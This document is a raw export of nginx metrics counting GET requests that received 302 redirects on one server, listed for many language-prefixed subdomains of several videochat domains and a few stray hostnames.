nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.cafe"} 662 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.date"} 825 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.mx"} 968 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.show"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.tv.br"} 471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.world"} 2433 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.cafe"} 795 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.date"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.mx"} 3394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.show"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.tv.br"} 2679 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.world"} 3613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.cafe"} 694 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.date"} 1980 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.mx"} 2953 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.show"} 1719 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.tv.br"} 2012 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.world"} 2139 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.cafe"} 625 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.date"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.mx"} 1244 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.show"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.tv.br"} 653 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.world"} 2412 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.cafe"} 1430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.date"} 563 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.mx"} 1141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.show"} 700 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.tv.br"} 1180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.world"} 3794 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.cafe"} 1353 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.date"} 255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.mx"} 892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.show"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.tv.br"} 1735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.world"} 2715 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.cafe"} 629 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.date"} 238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.mx"} 1245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.show"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.tv.br"} 665 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.world"} 2624 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="harvestreako.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.cafe"} 927 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.date"} 2317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.mx"} 987 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.show"} 418 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.tv.br"} 774 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.world"} 2342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.cafe"} 781 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.date"} 2085 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.mx"} 1051 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.show"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.tv.br"} 970 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.world"} 2427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.cafe"} 645 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.date"} 2408 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.mx"} 910 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.show"} 2364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.tv.br"} 677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.world"} 2575 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.cafe"} 1079 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.date"} 349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.mx"} 1157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.show"} 820 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.tv.br"} 600 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.world"} 928 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="httnl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="httpbin.org"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="httpgl.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.cafe"} 2985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.date"} 1830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.mx"} 830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.show"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.tv.br"} 677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.world"} 2480 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.cafe"} 706 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.date"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.mx"} 807 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.show"} 716 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.tv.br"} 520 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.world"} 2042 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.cafe"} 1243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.date"} 287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.mx"} 1082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.show"} 277 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.tv.br"} 1067 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.world"} 2475 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.cafe"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.date"} 2019 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.mx"} 1205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.show"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.tv.br"} 436 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.world"} 1744 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jaiyuba.videochat.mx"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.cafe"} 886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.date"} 2246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.mx"} 896 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.show"} 183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.tv.br"} 511 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.world"} 2391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.cafe"} 708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.date"} 543 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.mx"} 819 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.show"} 425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.tv.br"} 2070 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.world"} 651 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.cafe"} 1028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.date"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.mx"} 975 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.show"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.tv.br"} 588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.world"} 851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kbmjvka.videochat.mx"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kctjjudm.videochat.mx"} 421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kjjlaro.videochat.mx"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.cafe"} 859 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.date"} 256 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.mx"} 1063 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.show"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.tv.br"} 835 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.world"} 3799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.cafe"} 675 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.date"} 528 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.mx"} 1309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.show"} 122 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.tv.br"} 2842 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.world"} 2943 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.cafe"} 886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.date"} 156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.mx"} 881 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.show"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.tv.br"} 2231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.world"} 2262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.cafe"} 580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.date"} 2214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.mx"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.show"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.tv.br"} 545 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.world"} 2037 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.cafe"} 898 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.date"} 203 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.mx"} 1068 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.show"} 557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.tv.br"} 904 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.world"} 2753 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.cafe"} 977 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.date"} 373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.mx"} 961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.show"} 286 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.tv.br"} 442 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.world"} 2168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lekker-lopeaf.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lhuqozrhffuzjrval.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="linderafashionstylgl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.cafe"} 1008 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.date"} 394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.mx"} 1210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.show"} 363 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.tv.br"} 1425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.world"} 2402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.cafe"} 685 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.date"} 2396 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.mx"} 799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.show"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.tv.br"} 475 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.world"} 2485 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.cafe"} 798 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.date"} 2072 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.mx"} 1383 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.show"} 207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.tv.br"} 638 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lv.videochat.world"} 2677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mail.videochat.mx"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.cafe"} 1014 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.date"} 393 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.mx"} 1098 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.show"} 301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.tv.br"} 825 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mg.videochat.world"} 2507 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.cafe"} 592 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.date"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.mx"} 1090 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.show"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.tv.br"} 1131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mi.videochat.world"} 547 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.cafe"} 761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.date"} 2237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.mx"} 1150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.show"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.tv.br"} 626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mk.videochat.world"} 2103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.cafe"} 598 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.date"} 202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.mx"} 1132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.show"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.tv.br"} 430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ml.videochat.world"} 1758 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.cafe"} 738 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.date"} 247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.mx"} 1093 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.show"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.tv.br"} 611 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mn.videochat.world"} 693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mpositesmodeca.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.cafe"} 2101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.date"} 161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.mx"} 743 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.show"} 602 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.tv.br"} 749 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mr.videochat.world"} 1959 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.cafe"} 842 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.date"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.mx"} 1375 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.show"} 457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.tv.br"} 1197 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mrj.videochat.world"} 930 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.cafe"} 595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.date"} 322 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.mx"} 1138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.show"} 119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.tv.br"} 565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ms.videochat.world"} 1844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.cafe"} 1595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.date"} 492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.mx"} 2805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.show"} 275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.tv.br"} 810 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mt.videochat.world"} 2929 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="mta-sts.videochat.mx"} 139 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.cafe"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.date"} 165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.mx"} 878 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.show"} 419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.tv.br"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="my.videochat.world"} 1814 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nd-homes-vi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.cafe"} 936 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.date"} 616 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.mx"} 2384 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.show"} 684 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.tv.br"} 2381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ne.videochat.world"} 1987 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="new.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.cafe"} 659 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.date"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.mx"} 1157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.show"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.tv.br"} 633 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="nl.videochat.world"} 1739 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.cafe"} 599 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.date"} 1846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.mx"} 2592 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.show"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.tv.br"} 482 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="no.videochat.world"} 2280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="omsco.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="orientalcarpetcreationbbluebasilbrohml.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="osu.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.cafe"} 753 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.date"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.mx"} 1180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.show"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.tv.br"} 878 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pa.videochat.world"} 1499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="panicbot.net"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.cafe"} 580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.date"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.mx"} 1268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.show"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.tv.br"} 428 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pap.videochat.world"} 649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pkiaram.videochat.mx"} 384 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.cafe"} 2132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.date"} 2605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.mx"} 1220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.show"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.tv.br"} 461 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pl.videochat.world"} 2663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="portal.halocloudnet.com"} 1 